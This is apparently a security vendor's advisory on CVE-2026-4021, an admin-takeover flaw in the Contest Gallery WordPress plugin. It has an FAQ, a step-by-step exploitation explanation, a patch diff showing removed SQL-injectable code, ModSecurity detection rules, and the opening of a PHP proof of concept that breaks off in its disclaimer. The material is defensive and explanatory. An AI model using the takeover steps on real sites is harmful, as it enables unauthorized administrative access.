What is CVE-2026-4021?

CVE-2026-4021 is a high-severity vulnerability in the Contest Gallery plugin for WordPress, allowing unauthenticated attackers to escalate privileges and take over administrator accounts. This is due to a flaw in the email confirmation handler that misuses user email strings in SQL queries.

How does the vulnerability work?

The vulnerability exploits a type confusion issue where an attacker registers with an email starting with a numeric user ID. This allows the attacker to overwrite the admin’s user activation key and authenticate as the admin without credentials.

Who is affected by this vulnerability?

All installations of the Contest Gallery plugin up to and including version 28.1.5 are affected. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Contest Gallery plugin in use. If it is version 28.1.5 or earlier, your site is at risk and should be updated immediately.

How can I fix or mitigate this issue?

To fix this vulnerability, update the Contest Gallery plugin to version 28.1.6 or later, where the issue has been patched. Regularly updating all plugins is crucial for maintaining site security.

What does the CVSS score of 8.1 indicate?

A CVSS score of 8.1 indicates a high severity level, meaning that the vulnerability poses a significant risk to the security of the WordPress site. Exploitation can lead to complete administrative access and control over the site.

What practical risks does this vulnerability pose?

If exploited, an attacker can gain full administrative access, create new admin accounts, modify site settings, upload malicious files, and access sensitive user data. This could lead to data breaches and site defacement.

What are the key changes made in the patch?

The patch replaces the vulnerable SQL query with safer methods, ensuring proper integer comparison. It also enhances the login mechanism to require additional validation parameters, reducing the risk of unauthorized access.

How does the proof of concept demonstrate the vulnerability?

The proof of concept outlines the steps an attacker would take to exploit the vulnerability, including registering with a crafted email and triggering the confirmation flow to overwrite the admin’s activation key. This illustrates the ease of exploitation.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Contest Gallery plugin until the update can be applied. Additionally, review user accounts for any unauthorized changes and monitor site activity closely.

Are there any other security practices I should follow?

In addition to updating plugins, regularly back up your site, use strong passwords, implement two-factor authentication, and monitor user activity. These practices help enhance overall site security.

Where can I find more information about this vulnerability?

More information about CVE-2026-4021 can be found on the official CVE database, security advisories from WordPress, and relevant security blogs that cover WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 24, 2026

CVE-2026-4021: Contest Gallery <= 28.1.5 – Unauthenticated Privilege Escalation Admin Account Takeover via Registration Confirmation Email-to-ID Type Confusion (contest-gallery)

CVE ID CVE-2026-4021

Plugin contest-gallery

Severity High (CVSS 8.1)

CWE 287

Vulnerable Version 28.1.5

Patched Version 28.1.6

Disclosed March 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4021:
This vulnerability is an unauthenticated privilege escalation leading to administrator account takeover in the Contest Gallery WordPress plugin. The flaw exists in the plugin’s user registration and email confirmation system. When the non-default RegMailOptional=1 setting is enabled, an attacker can exploit a type confusion vulnerability to overwrite any WordPress user’s activation key and subsequently authenticate as that user via a key-based login endpoint. The vulnerability receives a CVSS score of 8.1 (High) and enables complete site compromise.

The root cause is a type confusion vulnerability in the email confirmation handler at contest-gallery/v10/v10-admin/users/frontend/registry/users-registry-check-after-email-or-pin-confirmation.php. The vulnerable code uses a user’s email string in a WHERE ID = %s clause instead of the numeric user ID. When the plugin executes the SQL UPDATE statement on line 156-164 (in the vulnerable version), it passes the $unconfirmedMail variable (containing an email address) as the second parameter to $wpdb->prepare() with a %s placeholder for the ID column. MySQL performs integer coercion on the email string, extracting leading numeric digits. An attacker can register with an email like 1poc@example.test, where ‘1’ represents the target admin’s user ID. The confirmation flow then updates the admin’s user_activation_key instead of the attacker’s.

Exploitation requires three steps. First, the attacker registers a new account with an email address starting with the target administrator’s numeric user ID (e.g., 1admin@attacker.test). Second, the attacker triggers the email confirmation flow, which causes the plugin to execute the vulnerable UPDATE query. This overwrites the admin’s user_activation_key in the wp_users table with a confirmation key. Third, the attacker calls the post_cg1l_login_user_by_key AJAX action at contest-gallery/ajax/ajax-functions-frontend.php lines 210-240, providing the stolen activation key via the cglKey parameter. The vulnerable login handler validates the key against the database and authenticates the attacker as the administrator without requiring credentials.

The patch addresses multiple issues. In users-registry-check-after-email-or-pin-confirmation.php, the developers replaced the vulnerable $wpdb->query($wpdb->prepare(…)) call with $wpdb->update() using absint($newWpId) for the WHERE clause, ensuring integer comparison. They also removed the direct exposure of the activation key in JavaScript responses. In ajax-functions-frontend.php, the login handler now requires both cgJustLoggedInWpUserId and cglKey parameters, validates them via get_user_meta() and hash_equals(), and uses wp_set_current_user() instead of querying the wp_users table by activation key. The patch also introduces transient-based PIN request keys to prevent direct exposure of activation keys.

Successful exploitation grants an unauthenticated attacker full administrative access to the WordPress site. The attacker can create new administrator accounts, modify plugin settings, upload malicious files, deface the site, access sensitive user data, and execute arbitrary code through plugin or theme editors. The vulnerability completely bypasses WordPress authentication mechanisms and enables persistent backdoor installation.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/contest-gallery/ajax/ajax-functions-frontend.php
+++ b/contest-gallery/ajax/ajax-functions-frontend.php
@@ -186,10 +186,12 @@
             $WpUserId = absint($_POST['cgJustLoggedInWpUserId']);
             $cgGetLoggedInFrontendUserKey = sanitize_text_field($_POST['cgGetLoggedInFrontendUserKey']);
             $cgGetLoggedInFrontendUserKeyToCompare = get_user_meta( $WpUserId,'cgGetLoggedInFrontendUserKey',true);
-            if(!empty($cgGetLoggedInFrontendUserKeyToCompare) && $cgGetLoggedInFrontendUserKeyToCompare == $cgGetLoggedInFrontendUserKey){
+            if(!empty($cgGetLoggedInFrontendUserKeyToCompare) && hash_equals((string)$cgGetLoggedInFrontendUserKeyToCompare, (string)$cgGetLoggedInFrontendUserKey)){
         ?>
         <script data-cg-processing-current-nonce="true">
             cgJsClass.gallery.vars.currentCgNonce = <?php echo json_encode(wp_create_nonce('cg1l_action')); ?>;
+                    cgJsClass.gallery.vars.cgGetLoggedInFrontendUserKey = '';
+                    cgJsClass.gallery.vars.cgJustLoggedInWpUserId = '';
         </script>
         <?php
                 delete_user_meta( $WpUserId,'cgGetLoggedInFrontendUserKey');
@@ -210,22 +212,20 @@
             global $wpdb;
             $tablename = $wpdb->prefix . "contest_gal1ery";
             $gid = absint($_POST['cgl_gid']);
-            $activation_key = sanitize_text_field($_POST['cglKey']);
-            if(empty($activation_key)){
+            $WpUserId = absint($_POST['cgJustLoggedInWpUserId']);
+            $cgGetLoggedInFrontendUserKey = sanitize_text_field($_POST['cglKey']);
+            if(empty($WpUserId) || empty($cgGetLoggedInFrontendUserKey)){
+                exit();
+            }
+            $cgGetLoggedInFrontendUserKeyToCompare = get_user_meta( $WpUserId,'cgGetLoggedInFrontendUserKey',true);
+            if(!empty($cgGetLoggedInFrontendUserKeyToCompare) && hash_equals((string)$cgGetLoggedInFrontendUserKeyToCompare, (string)$cgGetLoggedInFrontendUserKey)){
+                $userRow = get_userdata($WpUserId);
+                if(empty($userRow)){
                 exit();
             }
-            $userRow = $wpdb->get_row(
-                $wpdb->prepare(
-                    "SELECT *
-             FROM {$wpdb->users}
-             WHERE user_activation_key = %s",
-                    $activation_key
-                )
-            );
-            if ( !empty($userRow)) {
                 $wpNickname = $userRow->display_name;
                 $WpUserEmail = $userRow->user_email;
-                $WpUserId = $userRow->ID;
+                wp_set_current_user($WpUserId);
                 wp_set_auth_cookie( $WpUserId,true );
                 $profileImage = '';
                 $wpUploadProfileImage = $wpdb->get_var( $wpdb->prepare(
--- a/contest-gallery/functions/general/cg-general-functions.php
+++ b/contest-gallery/functions/general/cg-general-functions.php
@@ -1255,27 +1255,31 @@
         return $cg_create_tablename_mails;
     }
 }
-function cg_format_options_version($Version) {
-    $parts = explode('.', $Version);
-    $main = $parts[0];
-
-    // If no dot is present, return the main part
-    if (count($parts) < 2) return $main;
-
-    // Merge all decimals into one string
-    $decimalString = implode('', array_slice($parts, 1));
-
-    // Special case: Only zeros (e.g., 23.0.0 -> 23)
-    if (ltrim($decimalString, '0') === '') {
-        return (float)$main;
-    }

-    // Combine and round to max 2 decimal places
-    $combined = $main . '.' . $decimalString;
-    $rounded = round((float)$combined, 2);

-    // Casting to float ensures that trailing zeros are removed (e.g., 23.10 -> 23.1)
-    return (float)$rounded;
+if(!function_exists('cg_format_options_version')){
+    function cg_format_options_version($Version) {
+        $parts = explode('.', $Version);
+        $main = $parts[0];
+
+        // If no dot is present, return the main part
+        if (count($parts) < 2) return $main;
+
+        // Merge all decimals into one string
+        $decimalString = implode('', array_slice($parts, 1));
+
+        // Special case: Only zeros (e.g., 23.0.0 -> 23)
+        if (ltrim($decimalString, '0') === '') {
+            return (float)$main;
+        }
+
+        // Combine and round to max 2 decimal places
+        $combined = $main . '.' . $decimalString;
+        $rounded = round((float)$combined, 2);
+
+        // Casting to float ensures that trailing zeros are removed (e.g., 23.10 -> 23.1)
+        return (float)$rounded;
+    }
 }

 ?>
 No newline at end of file
--- a/contest-gallery/functions/general/cg-get-version.php
+++ b/contest-gallery/functions/general/cg-get-version.php
@@ -17,7 +17,7 @@
 if(!function_exists('cg_get_version_for_scripts')){
     function cg_get_version_for_scripts () {
         /**###NORMAL###**/
-        return '28.1.5';
+        return '28.1.6';
         /**###NORMAL-END###**/
     }
 }
 No newline at end of file
--- a/contest-gallery/index.php
+++ b/contest-gallery/index.php
@@ -2,7 +2,7 @@
 /*
 Plugin Name: Contest Gallery
 Description: Upload form, files, photos and videos upload contest gallery plugin for WordPress. Create upload forms for entries with or without file/image upload. Create user registration form. Create login form. Create responsive galleries and allow to vote for any kind of entries. Sell entries via PayPal or Stripe API. Create or edit images via OpenAI API.
-Version: 28.1.5
+Version: 28.1.6
 Author: Contest Gallery
 Plugin URI: https://www.contest-gallery.com
 Author URI: https://www.contest-gallery.com
@@ -808,8 +808,8 @@

             global $wpdb;
             $tablename_ecommerce_orders = $wpdb->prefix . "contest_gal1ery_ecommerce_orders";
-            $OrderId = sanitize_text_field($_GET['cg_download_invoice_order_id_hash']);
-            $Order = $wpdb->get_row("SELECT * FROM $tablename_ecommerce_orders WHERE OrderIdHash = '$OrderId' LIMIT 1");
+            $OrderId = sanitize_text_field(wp_unslash($_GET['cg_download_invoice_order_id_hash']));
+            $Order = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename_ecommerce_orders WHERE OrderIdHash = %s LIMIT 1",$OrderId));

             if(empty($Order)){
                 echo "Order not found to download invoice";die;
@@ -856,8 +856,8 @@

             global $wpdb;
             $tablename_ecommerce_orders = $wpdb->prefix . "contest_gal1ery_ecommerce_orders";
-            $OrderId = sanitize_text_field($_GET['cg_download_logs_order_id_hash']);
-            $Order = $wpdb->get_row("SELECT * FROM $tablename_ecommerce_orders WHERE OrderIdHash = '$OrderId' LIMIT 1");
+            $OrderId = sanitize_text_field(wp_unslash($_GET['cg_download_logs_order_id_hash']));
+            $Order = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename_ecommerce_orders WHERE OrderIdHash = %s LIMIT 1",$OrderId));

             if(empty($Order)){
                 echo "Order not found to download logs";die;
@@ -901,9 +901,9 @@
             $tablename_ecommerce_orders = $wpdb->prefix . "contest_gal1ery_ecommerce_orders";
 			$tablename_ecommerce_orders_items = $wpdb->prefix . "contest_gal1ery_ecommerce_orders_items";
 			$tablePostMeta = $wpdb->prefix . "postmeta";
-            $OrderIdHash = sanitize_text_field($_GET['cg_download_file_order_id_hash']);
+			$OrderIdHash = sanitize_text_field(wp_unslash($_GET['cg_download_file_order_id_hash']));
             $WpUpload = absint($_GET['cg_wp_upload']);
-			$Order = $wpdb->get_row("SELECT * FROM $tablename_ecommerce_orders WHERE OrderIdHash = '$OrderIdHash' LIMIT 1");
+			$Order = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename_ecommerce_orders WHERE OrderIdHash = %s LIMIT 1",$OrderIdHash));

 			if((empty($_COOKIE['cg_order']) || $_COOKIE['cg_order']!=cg_hash_function('---cg_order---'.$OrderIdHash)) &&
 			!is_user_logged_in()){
--- a/contest-gallery/v10/v10-admin/export/export-user-data-registry.php
+++ b/contest-gallery/v10/v10-admin/export/export-user-data-registry.php
@@ -17,22 +17,27 @@

 // Tabellennamen bestimmen

-        if(!empty($_GET['wp_uid'])){$selectWPusers = $wpdb->get_results("SELECT DISTINCT * FROM $wpUsers WHERE ID='".@$_GET['wp_uid']."' ORDER BY id ASC");}
-        elseif(empty($_POST['cg-user-name']) AND !empty($_POST['galleryIdToSelect'])){
+        $wpUid = !empty($_GET['wp_uid']) ? absint($_GET['wp_uid']) : 0;
+        $galleryIdToSelect = !empty($_POST['galleryIdToSelect']) ? absint($_POST['galleryIdToSelect']) : 0;
+        $cgUserName = !empty($_POST['cg-user-name']) ? wp_unslash($_POST['cg-user-name']) : '';
+        $cgUserNameLike = '%' . $wpdb->esc_like($cgUserName) . '%';

-            $selectWPusers = $wpdb->get_results("SELECT DISTINCT  $wpUsers.* FROM $wpUsers, $entriesShort WHERE $wpUsers.ID=$entriesShort.wp_user_id AND $entriesShort.GalleryID='".$_POST['galleryIdToSelect']."'");
+        if(!empty($wpUid)){$selectWPusers = $wpdb->get_results($wpdb->prepare("SELECT DISTINCT * FROM $wpUsers WHERE ID=%d ORDER BY id ASC",$wpUid));}
+        elseif(empty($cgUserName) AND !empty($galleryIdToSelect)){
+
+            $selectWPusers = $wpdb->get_results($wpdb->prepare("SELECT DISTINCT  $wpUsers.* FROM $wpUsers, $entriesShort WHERE $wpUsers.ID=$entriesShort.wp_user_id AND $entriesShort.GalleryID=%d",$galleryIdToSelect));

         }
-        elseif(!empty($_POST['cg-user-name']) AND empty($_POST['galleryIdToSelect'])){
+        elseif(!empty($cgUserName) AND empty($galleryIdToSelect)){
             // var_dump(1);
-            $selectWPusers = $wpdb->get_results("SELECT DISTINCT  $wpUsers.* FROM $wpUsers WHERE user_login LIKE '%".@$_POST['cg-user-name']."%' or user_email LIKE '%".@$_POST['cg-user-name']."%'");
+            $selectWPusers = $wpdb->get_results($wpdb->prepare("SELECT DISTINCT  $wpUsers.* FROM $wpUsers WHERE user_login LIKE %s or user_email LIKE %s",$cgUserNameLike,$cgUserNameLike));
         }
-        elseif(!empty($_POST['cg-user-name']) AND !empty($_POST['galleryIdToSelect'])){
+        elseif(!empty($cgUserName) AND !empty($galleryIdToSelect)){
             //  var_dump(2);
-            $selectWPusers = $wpdb->get_results("SELECT DISTINCT  $wpUsers.* FROM $wpUsers, $entriesShort WHERE $wpUsers.id=$entriesShort.wp_user_id AND
-        ($wpUsers.user_login LIKE '%".@$_POST['cg-user-name']."%' or $wpUsers.user_email LIKE '%".@$_POST['cg-user-name']."%')
-		 AND $entriesShort.GalleryID='".$_POST['galleryIdToSelect']."'
-		 ");
+            $selectWPusers = $wpdb->get_results($wpdb->prepare("SELECT DISTINCT  $wpUsers.* FROM $wpUsers, $entriesShort WHERE $wpUsers.id=$entriesShort.wp_user_id AND
+        ($wpUsers.user_login LIKE %s or $wpUsers.user_email LIKE %s)
+		 AND $entriesShort.GalleryID=%d
+		 ",$cgUserNameLike,$cgUserNameLike,$galleryIdToSelect));
         }
         else{

--- a/contest-gallery/v10/v10-admin/users/admin/users/management-show-users.php
+++ b/contest-gallery/v10/v10-admin/users/admin/users/management-show-users.php
@@ -63,7 +63,8 @@

 if(!empty($_GET['wp_user_id'])){

-    $selectWPusers = $wpdb->get_results("SELECT * FROM $wpUsers WHERE ID = '".$_GET['wp_user_id']."'");
+    $wpUserId = absint($_GET['wp_user_id']);
+    $selectWPusers = $wpdb->get_results($wpdb->prepare("SELECT * FROM $wpUsers WHERE ID = %d",$wpUserId));

     $rows = $wpdb->get_var(
         "
@@ -73,26 +74,27 @@

 }elseif(!empty($_POST['cg-search-user-name']) OR !empty($_GET['cg-search-user-name'])){

-        $cgUserName = (!empty($_POST['cg-search-user-name'])) ? sanitize_text_field(htmlentities(html_entity_decode($_POST['cg-search-user-name']))) : sanitize_text_field(htmlentities(html_entity_decode($_GET['cg-search-user-name'])));
+        $cgUserName = (!empty($_POST['cg-search-user-name'])) ? sanitize_text_field(htmlentities(html_entity_decode(wp_unslash($_POST['cg-search-user-name'])))) : sanitize_text_field(htmlentities(html_entity_decode(wp_unslash($_GET['cg-search-user-name']))));
+        $cgUserNameLike = '%' . $wpdb->esc_like($cgUserName) . '%';
         $cgUserNameGetParam = '&cg-search-user-name='.$cgUserName;

         if(!empty($cgSearchGalleryId)){

-            $selectWPusers = $wpdb->get_results("SELECT DISTINCT $toSelect FROM $wpUsers, $entriesShort WHERE ($wpUsers.user_login LIKE '%$cgUserName%' OR $wpUsers.user_email LIKE '%$cgUserName%') AND ($wpUsers.ID = $entriesShort.wp_user_id AND $entriesShort.GalleryID = '$cgSearchGalleryId') ORDER BY $wpUsers.ID ASC LIMIT $start, $step");
+            $selectWPusers = $wpdb->get_results($wpdb->prepare("SELECT DISTINCT $toSelect FROM $wpUsers, $entriesShort WHERE ($wpUsers.user_login LIKE %s OR $wpUsers.user_email LIKE %s) AND ($wpUsers.ID = $entriesShort.wp_user_id AND $entriesShort.GalleryID = %d) ORDER BY $wpUsers.ID ASC LIMIT %d, %d",$cgUserNameLike,$cgUserNameLike,$cgSearchGalleryId,$start,$step));

-            $rows = count($wpdb->get_results(
+            $rows = count($wpdb->get_results($wpdb->prepare(
                 "
 		SELECT DISTINCT $wpUsers.ID
-		FROM $wpUsers, $entriesShort WHERE ($wpUsers.user_login LIKE '%$cgUserName%' OR $wpUsers.user_email LIKE '%$cgUserName%') AND ($wpUsers.ID = $entriesShort.wp_user_id AND $entriesShort.GalleryID = '$cgSearchGalleryId')"
-            ));
+		FROM $wpUsers, $entriesShort WHERE ($wpUsers.user_login LIKE %s OR $wpUsers.user_email LIKE %s) AND ($wpUsers.ID = $entriesShort.wp_user_id AND $entriesShort.GalleryID = %d)",$cgUserNameLike,$cgUserNameLike,$cgSearchGalleryId
+            )));

         }else{
-            $selectWPusers = $wpdb->get_results("SELECT $toSelect FROM $wpUsers WHERE user_login LIKE '%$cgUserName%' OR user_email LIKE '%$cgUserName%' ORDER BY $wpUsers.ID ASC LIMIT $start, $step");
-            $rows = $wpdb->get_var(
+            $selectWPusers = $wpdb->get_results($wpdb->prepare("SELECT $toSelect FROM $wpUsers WHERE user_login LIKE %s OR user_email LIKE %s ORDER BY $wpUsers.ID ASC LIMIT %d, %d",$cgUserNameLike,$cgUserNameLike,$start,$step));
+            $rows = $wpdb->get_var($wpdb->prepare(
                 "
 		SELECT COUNT(*) AS NumberOfRows
-		FROM $wpUsers WHERE user_login LIKE '%$cgUserName%' OR user_email LIKE '%$cgUserName%'"
-            );
+		FROM $wpUsers WHERE user_login LIKE %s OR user_email LIKE %s",$cgUserNameLike,$cgUserNameLike
+            ));
         }

     }elseif(!empty($cgSearchGalleryId)){
--- a/contest-gallery/v10/v10-admin/users/frontend/registry/users-registry-check-after-email-or-pin-confirmation.php
+++ b/contest-gallery/v10/v10-admin/users/frontend/registry/users-registry-check-after-email-or-pin-confirmation.php
@@ -7,8 +7,13 @@
 $tablenameWpUserMeta = $wpdb->base_prefix . "usermeta";
 $tablenameCreateUserEntries = $wpdb->prefix . "contest_gal1ery_create_user_entries";

+$cgPinRequestKey = '';
 if(!empty($cg_users_pin_from_email_check)){
-    $cgkey = sanitize_text_field(wp_unslash($_POST["cglActivationKey"]));
+    $cgPinRequestKey = sanitize_text_field(wp_unslash($_POST["cglActivationKey"]));
+    $cgkey = get_transient('cg_pin_request_key_'.$cgPinRequestKey);
+    if(empty($cgkey)){
+        $cgkey = '';
+    }
 }else{
     $cgkey = sanitize_text_field(wp_unslash($_GET["cgkey"]));
 }
@@ -148,12 +153,21 @@
             $cgkeyForWpUserTable = 'cg-key---'.$cgkey;
         }
         // '-confirmed' was added in update 10.9.8.8.0
-        $wpdb->query($wpdb->prepare(
-            "
-            UPDATE $tablenameWpUsers SET user_activation_key = %s WHERE ID = %s
-        ",
-            $cgkeyForWpUserTable."-confirmed",$unconfirmedMail
-        ));
+        $wpdb->update(
+            $tablenameWpUsers,
+            [
+                'user_activation_key' => $cgkeyForWpUserTable.'-confirmed',
+            ],
+            [
+                'ID' => absint($newWpId),
+            ],
+            [
+                '%s',
+            ],
+            [
+                '%d',
+            ]
+        );
         cg1l_delete_unconfirmed_user($unconfirmedMail);
         include (__DIR__.'/users-registry-render-confirmation-or-signin.php');
         return;
@@ -347,11 +361,13 @@
                 //wp_set_auth_cookie( $newWpId,true );// will be done ajax
                 $cgGetLoggedInFrontendUserKey = wp_hash_password(wp_generate_password( 32, true, true ));
                 update_user_meta( $newWpId, 'cgGetLoggedInFrontendUserKey', $cgGetLoggedInFrontendUserKey);
+                if(!empty($cgPinRequestKey)){
+                    delete_transient('cg_pin_request_key_'.$cgPinRequestKey);
+                }
                 ?>
                 <script  data-cg-processing="true" data-cg-success="true">
                     cgJsClass.gallery.vars.pinMessage = 'success';
                     cgJsClass.gallery.vars.pinVerified = true;
-                    cgJsClass.gallery.vars.activationKeyConfirmed = <?php echo json_encode($cgkeyForWpUserTable.'-confirmed');?>;
                     cgJsClass.gallery.vars.cgGetLoggedInFrontendUserKey = <?php echo json_encode($cgGetLoggedInFrontendUserKey);?>;
                     cgJsClass.gallery.vars.cgJustLoggedInWpUserId = <?php echo json_encode($newWpId);?>;
                 </script>
--- a/contest-gallery/v10/v10-admin/users/frontend/registry/users-registry-check-registering-and-login.php
+++ b/contest-gallery/v10/v10-admin/users/frontend/registry/users-registry-check-registering-and-login.php
@@ -309,16 +309,22 @@
                 cg_registry_add_profile_image('cg_input_image_upload_file',$newWpId,false,false,$attach_id);
             }

+			$cgGetLoggedInFrontendUserKey = wp_hash_password(wp_generate_password( 32, true, true ));
+			update_user_meta( $newWpId, 'cgGetLoggedInFrontendUserKey', $cgGetLoggedInFrontendUserKey);
+
             //wp_set_auth_cookie( $newWpId,true );// will be done ajax

-            $addOn = 'cg_gallery_id_registry='.$GalleryID.'&cg_login_user_after_registration=true&cg_activation_key='.$activation_key;
+			$addOn = 'cg_gallery_id_registry='.$GalleryID.'&cg_login_user_after_registration=true';

             $url = (strpos($currentPageUrl, '?')) ? $currentPageUrl . '&' .$addOn : $currentPageUrl . '?' .$addOn;
             // if RegMailOptional and direct login after registration!!!
             ?>
             <script  data-cg-processing="true" data-cg-success="true">
-                var result = cgJsClass.gallery.registry.functions.loginUserByKey(jQuery,0,<?php echo json_encode($activation_key);?>);
+				cgJsClass.gallery.vars.cgGetLoggedInFrontendUserKey = <?php echo json_encode($cgGetLoggedInFrontendUserKey);?>;
+				cgJsClass.gallery.vars.cgJustLoggedInWpUserId = <?php echo json_encode($newWpId);?>;
+				var result = cgJsClass.gallery.registry.functions.loginUserByKey(jQuery,0,cgJsClass.gallery.vars.cgGetLoggedInFrontendUserKey);
                 if(result){
+					cgJsClass.gallery.function.general.tools.getCurrentNonce(jQuery);
                     cgJsClass.gallery.vars.$regFormContainer.find('#cg_check_mail_name_value').val(0);// then success and can be reloaded, val(1) will be set when form submit
                     var url = <?php echo json_encode($url);?>;
                     window._cgLocationUrl = url;
@@ -344,9 +350,11 @@
     }else{

         if($cg_users_pin){
+			$cgPinRequestKey = wp_generate_password(48, false, false);
+			set_transient('cg_pin_request_key_'.$cgPinRequestKey, $activation_key, DAY_IN_SECONDS);
             ?>
             <script  data-cg-processing="true" data-cg-success="true">
-                cgJsClass.gallery.vars.activationKey = <?php echo json_encode($activation_key);?>;
+				cgJsClass.gallery.vars.activationKey = <?php echo json_encode($cgPinRequestKey);?>;
             </script>
             <?php
             die;
--- a/contest-gallery/v10/v10-admin/users/frontend/registry/users-registry-resend-pin.php
+++ b/contest-gallery/v10/v10-admin/users/frontend/registry/users-registry-resend-pin.php
@@ -10,7 +10,11 @@
 $tablenameProOptions = $wpdb->prefix . "contest_gal1ery_pro_options";
 $tablenameCreateUserEntries = $wpdb->prefix . "contest_gal1ery_create_user_entries";

-$cglActivationKeyResend = sanitize_text_field(wp_unslash($_POST["cglActivationKeyResend"]));
+$cglPinRequestKeyResend = sanitize_text_field(wp_unslash($_POST["cglActivationKeyResend"]));
+$cglActivationKeyResend = get_transient('cg_pin_request_key_'.$cglPinRequestKeyResend);
+if(empty($cglActivationKeyResend)){
+    $cglActivationKeyResend = '';
+}

 $userAccountEntries = $wpdb->get_results( $wpdb->prepare("SELECT Field_Type, Field_Content, Tstamp FROM $tablenameCreateUserEntries WHERE activation_key=%s", $cglActivationKeyResend) );

@@ -59,9 +63,15 @@

     $wp_mail_result = cg1l_send_registration_mail($proOptions,0,$cg_users_pin,$cg_main_mail,$Subject, $TextEmailConfirmation, $activation_key_new, $posPin, $pin);

+    $cgPinRequestKey = wp_generate_password(48, false, false);
+    set_transient('cg_pin_request_key_'.$cgPinRequestKey, $activation_key_new, DAY_IN_SECONDS);
+    if(!empty($cglPinRequestKeyResend)){
+        delete_transient('cg_pin_request_key_'.$cglPinRequestKeyResend);
+    }
+
     ?>
     <script  data-cg-processing="true" data-cg-success="true">
-        cgJsClass.gallery.vars.activationKey = <?php echo json_encode($activation_key_new);?>;
+        cgJsClass.gallery.vars.activationKey = <?php echo json_encode($cgPinRequestKey);?>;
     </script>
     <?php
     die;
--- a/contest-gallery/v10/v10-frontend/ecommerce/ecommerce-show-order-frontend.php
+++ b/contest-gallery/v10/v10-frontend/ecommerce/ecommerce-show-order-frontend.php
@@ -76,9 +76,9 @@
 // please provide sales id should be visible if not provided
 // ales id sanitize $_GET und dann verarbeiten

-$OrderIdHash = cg1l_sanitize_method($_GET['cg_order']);
+$OrderIdHash = cg1l_sanitize_method(wp_unslash($_GET['cg_order']));
 //$optionsNormal = $wpdb->get_row("SELECT * FROM $tablename_ecommerce_orders WHERE id='$OrderId'");
-$Order = $wpdb->get_row("SELECT * FROM $tablename_ecommerce_orders WHERE OrderIdHash = '$OrderIdHash' LIMIT 1");
+$Order = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename_ecommerce_orders WHERE OrderIdHash = %s LIMIT 1",$OrderIdHash));

 if(empty($Order)){
 	echo "<p style='text-align: center;'><b>Order not found</b></p>";
--- a/contest-gallery/v10/v10-frontend/mail_confirm/mail_confirm_email_link.php
+++ b/contest-gallery/v10/v10-frontend/mail_confirm/mail_confirm_email_link.php
@@ -8,8 +8,8 @@
     $tablenameentries = $wpdb->prefix . "contest_gal1ery_entries";
     $tablename_mail_confirmation = $wpdb->prefix . "contest_gal1ery_mail_confirmation";

-    $hash = $_GET['confirmation_code'];
-    $checkCgMail = $wpdb->get_row( "SELECT * FROM $tablename_mails_collected WHERE Hash = '$hash'" );
+    $hash = sanitize_text_field(wp_unslash($_GET['confirmation_code']));
+    $checkCgMail = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename_mails_collected WHERE Hash = %s",$hash));

     if(!empty($checkCgMail)){

--- a/contest-gallery/v10/v10-frontend/user_upload/users-upload-check.php
+++ b/contest-gallery/v10/v10-frontend/user_upload/users-upload-check.php
@@ -1284,10 +1284,10 @@
                                         $ConfMailId = 0;

                                         // Update des haupttables mit WpUserId weiter unten
-                                        $checkWpMail = $wpdb->get_row( "SELECT ID, user_email FROM $wpUsers WHERE user_email = '$sendUserMail'" );
+                                        $checkWpMail = $wpdb->get_row($wpdb->prepare("SELECT ID, user_email FROM $wpUsers WHERE user_email = %s",$sendUserMail));

                                         if(empty($checkWpMail)){
-                                            $checkCgMail = $wpdb->get_row( "SELECT * FROM $tablename_mails_collected WHERE Mail = '$sendUserMail'" );
+                                            $checkCgMail = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename_mails_collected WHERE Mail = %s",$sendUserMail));

                                             if(!empty($checkCgMail)){
                                                 if($checkCgMail->Confirmed==1){

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-4021
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1004021,phase:2,deny,status:403,chain,msg:'CVE-2026-4021 Contest Gallery Admin Takeover via Registration Email Confusion',severity:'CRITICAL',tag:'CVE-2026-4021',tag:'WordPress',tag:'Plugin',tag:'Contest-Gallery'"
  SecRule ARGS_POST:action "@streq post_cg1l_create_user" "chain"
    SecRule ARGS_POST:cg_input_email "@rx ^\d+[^@]*@" 
      "t:none,t:urlDecodeUni,t:lowercase,ctl:auditLogParts=+E,setvar:'tx.cve_2026_4021_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1004022,phase:2,deny,status:403,chain,msg:'CVE-2026-4021 Contest Gallery Unauthenticated Key Login Attempt',severity:'CRITICAL',tag:'CVE-2026-4021',tag:'WordPress',tag:'Plugin',tag:'Contest-Gallery'"
  SecRule ARGS_POST:action "@streq post_cg1l_login_user_by_key" 
    "t:none,ctl:auditLogParts=+E,setvar:'tx.cve_2026_4021_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
